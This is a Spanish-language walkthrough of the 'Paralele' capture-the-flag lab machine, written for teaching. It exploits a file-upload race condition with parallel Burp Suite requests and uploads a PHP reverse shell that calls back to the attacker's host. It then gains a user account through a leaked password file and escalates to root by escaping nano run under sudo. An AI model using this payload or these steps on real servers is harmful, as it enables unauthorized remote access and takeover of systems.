CTF Paralele Intermediate
URL Download CTF = https://drive.google.com/file/d/1HAG4Lp8809IVbkR8mER6TxSuRXZC7lfT/view?usp=sharing
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip paralele.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_run.sh paralele.tarInfo:
██████╗ ██╗ ██╗███╗ ██╗██████╗ ██████╗ ██╗
██╔══██╗██║ ██║████╗ ██║╚════██╗██╔══██╗██║
██████╔╝██║ █╗ ██║██╔██╗ ██║ █████╔╝██║ ██║██║
██╔═══╝ ██║███╗██║██║╚██╗██║ ╚═══██╗██║ ██║╚═╝
██║ ╚███╔███╔╝██║ ╚████║██████╔╝██████╔╝██╗
╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═╝
==
@+:@ @##@
@++:-----+@ @@#+:----:+#
#-+-----:+:---------:
*::-----++-----::::#
::------+:--------:
#-+------+:-::-----#@
*::+=@@#++-------::@
@+= @++::+#@@@#*#
#-@
*+#++@
+-:::+-@
:-:+:::+
@+::*::::
*::++-::*
=:--:-:++ @-#
#*:---:--++@ @@
@::-:--++*
@::-:++#
*++*
:: Plataforma de máquinas vulnerables ::
:: Desarrollado por Pwn3d! y Dockerlabs - creado por @d1se0 ::
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█ FLAG{Pwn3d!_is_awesome!} █
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
[✔] bc ya está instalado.
[✔] Docker ya está instalado
[!] Limpiando previos contenedores e imágenes
[✔] Cargando la máquina virtual
[✔] Activando máquina virtual
[✔] Máquina activa. Dirección IP: 172.17.0.2
[!] Presiona Ctrl+C para limpiar y salirPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 06:35 EDT
Nmap scan report for 172.17.0.3
Host is up (0.00012s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: CTF Upload
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 secondsVeremos que solo tendremos un puerto 80, si entramos dentro del mismo veremos una pagina web normal en la que nos podremos registrar con un usuario, si lo hacemos e iniciamos sesion veremos que nos permite cambiar la foto de perfil del usuario con el cual nos hemos registrado.
Pero en la descripcion veremos que solamente permite archivos JPG/PNG por lo que vamos a subir un archivo normal de imagen, para ver donde se guardan.
Echo eso, veremos que se guarda en la carpeta /uploads, si probamos a subir un archivo PHP no nos dejara, vamos abrir BurpSuite para capturar la peticion de subida de archivo y veremos lo siguiente:
test.php
<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>Peticion Subida de archivo
POST /profile.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------141171181371320561168503348
Content-Length: 329
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/profile.php
Cookie: session=eyJ1c2VyIjoiZGlzZW8ifQ.aKQ-mw.iCU12CmvCah90wWOzNU9FO5bNPI; PHPSESSID=6l7ttl49kbdv23ip4k4j5uuhsl
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------141171181371320561168503348
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: application/x-php
<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
-----------------------------141171181371320561168503348--Vamos a probar a cambiar el tipo por text/html para que haya una mejor compatabilidad por si acaso, pero aun asi no nos deja, vamos a mandarlo al repeater con el Ctrl+R, ahora tambien mandaremos al repeater la otra peticion para poder leer el archivo que se deposita en /uploads de las imagenes teniendo algo asi:
Peticion Leer archivo
GET /uploads/test.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: session=eyJ1c2VyIjoiZGlzZW8ifQ.aKQ-mw.iCU12CmvCah90wWOzNU9FO5bNPI; PHPSESSID=6l7ttl49kbdv23ip4k4j5uuhsl
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Vamos a probar una vulnerabilidad llamada File Upload Race Condition / Time-of-Check-to-Time-of-Use (TOCTOU) vamos a enviar una peticion en paralelo, para que se envie la primera que es la subida del archivo y la segunda a la misma vez que es para leer el archivo en cuestion de milesimas, para que al leerlo lo ejecute y obtengamos una shell, por lo que tendremos que configurar BurpSuite en el Repeater de la siguiente forma:
peticion1 (Enviar archivo)
POST /profile.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------141171181371320561168503348
Content-Length: 329
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/profile.php
Cookie: session=eyJ1c2VyIjoiZGlzZW8ifQ.aKQ-mw.iCU12CmvCah90wWOzNU9FO5bNPI; PHPSESSID=6l7ttl49kbdv23ip4k4j5uuhsl
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------141171181371320561168503348
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/html
<?php
$sock=fsockopen("<IP>",<PORT>);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
-----------------------------141171181371320561168503348--peticion2 (Entrar en archivo)
GET /uploads/test.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: session=eyJ1c2VyIjoiZGlzZW8ifQ.aKQ-mw.iCU12CmvCah90wWOzNU9FO5bNPI; PHPSESSID=6l7ttl49kbdv23ip4k4j5uuhsl
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Tendremos que crear un grupo en BurpSuite de peticiones en la parte de Repeater donde hay un +, seleccionamos las peticiones y a crear, si todo sale bien, veremos esto:
Ahora vamos a darle a la felchita donde pone Send y veremos un desplegable el cual seleccionaremos la opcion llamada Send group in paralle (last-byte sync) con esto lo que haremos sera enviar las dos peticiones de forma simultanea.
Nos pondremos a la escucha antes de enviar nada.
nc -lvnp <PORT>Si enviamos estas peticiones en paralelo y funcionara, podremos ver lo siguiente donde tenemos la escucha:
listening on [any] 7777 ...
connect to [192.168.177.129] from (UNKNOWN) [172.17.0.2] 49998
whoami
www-dataSanitización de shell (TTY)
script /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Escalate user paralele69
Si enumeramos un poco veremos en la carpeta /tmp el siguiente archivo:
total 12
drwxrwxrwt 1 root root 4096 Aug 19 12:31 .
drwxr-xr-x 1 root root 4096 Aug 19 12:27 ..
-rw-r--r-- 1 root root 48 Aug 19 11:47 SuperMegaUltraPasswordSecret.txtSi leemos el archivo veremos lo siguiente:
paralele69:SkRzYURNYWxkYXdLd0RBT8OxazIxODMxMg==Veremos lo que parece ser la contraseña en Base64 del usuario paralele69, si lo decodificamos veremos esto:
echo 'SkRzYURNYWxkYXdLd0RBT8OxazIxODMxMg==' | base64 -dInfo:
JDsaDMaldawKwDAOñk218312Si lo probamos en dicho usuario veremos que no funcionara, si probamos el mismo Base64 tampoco funcionara, pero si probamos como contraseña el nombre del propio archivo, veremos que si funciona.
su paralele69Metemos como contraseña SuperMegaUltraPasswordSecret y veremos que estaremos dentro, por lo que leeremos la flag del usuario.
user.txt
123ae7e6ebf4af3a03459b1c4dc2f5bcEscalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for paralele69 on c9b500ac7efe:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User paralele69 may run the following commands on c9b500ac7efe:
(ALL : ALL) NOPASSWD: /usr/local/bin/email.shVeremos que podemos ejecutar el script email.sh como el usuario root, por lo que vamos a leer el script a ver que pone por dentro.
#!/bin/bash
# ========================================
# Tool: MsgTool - Simple message manager
# Author: Profesional Script
# Description: Guardar mensajes en archivos locales y abrirlos con nano
# ========================================
# Variables
MSG_DIR="./messages"
mkdir -p "$MSG_DIR"
# Función de ayuda
function show_help() {
cat << EOF
Usage: $0 [OPTION] [MESSAGE]
Opciones:
-h, --help Muestra esta ayuda
-n Abrir el editor nano para escribir un mensaje
-l, --list Listar todos los mensajes guardados
-r, --read FILE Leer un mensaje específico
-d, --delete FILE Borrar un mensaje específico
Si se proporciona un mensaje sin opciones, se guardará en un archivo con fecha y hora.
EOF
}
# Función para listar archivos
function list_messages() {
echo "Mensajes guardados en $MSG_DIR:"
ls -1 "$MSG_DIR"
}
# Función para leer mensaje
function read_message() {
local file="$MSG_DIR/$1"
if [[ -f "$file" ]]; then
echo "===== $1 ====="
cat "$file"
echo "=============="
else
echo "Error: El archivo '$1' no existe."
exit 1
fi
}
# Función para borrar mensaje
function delete_message() {
local file="$MSG_DIR/$1"
if [[ -f "$file" ]]; then
rm -f "$file"
echo "Archivo '$1' borrado correctamente."
else
echo "Error: El archivo '$1' no existe."
exit 1
fi
}
# Función para guardar mensaje
function save_message() {
local content="$1"
local filename="msg_$(date +'%Y%m%d_%H%M%S').txt"
echo "$content" > "$MSG_DIR/$filename"
echo "Mensaje guardado en $MSG_DIR/$filename"
}
# Función para abrir nano
function nano_message() {
local filename="msg_$(date +'%Y%m%d_%H%M%S').txt"
nano "$MSG_DIR/$filename"
echo "Mensaje guardado en $MSG_DIR/$filename"
}
# ======== MAIN ========
if [[ $# -eq 0 ]]; then
show_help
exit 0
fi
case "$1" in
-h|--help)
show_help
;;
-n)
nano_message
;;
-l|--list)
list_messages
;;
-r|--read)
if [[ -z "$2" ]]; then
echo "Error: Debes indicar el nombre del archivo a leer."
exit 1
fi
read_message "$2"
;;
-d|--delete)
if [[ -z "$2" ]]; then
echo "Error: Debes indicar el nombre del archivo a borrar."
exit 1
fi
delete_message "$2"
;;
*)
# Guardar mensaje directamente
save_message "$*"
;;
esacVemos que es un script muy simple, pero si leemos el help en la opcion -n veremos que ejecuta un nano por lo que si lo ejecutamos como root se estara ejecutando nano como root y podremos obtener una shell de esta forma:
sudo email.sh -n
R^X^
reset; bash 1>&0 2>&0Info:
root@c9b500ac7efe:/tmp# whoami
rootCon esto veremos que ya seremos root, por lo que leeremos la flag de root.
root.txt
bb1a9486dfbcf4affff71a5cba7e468bLast updated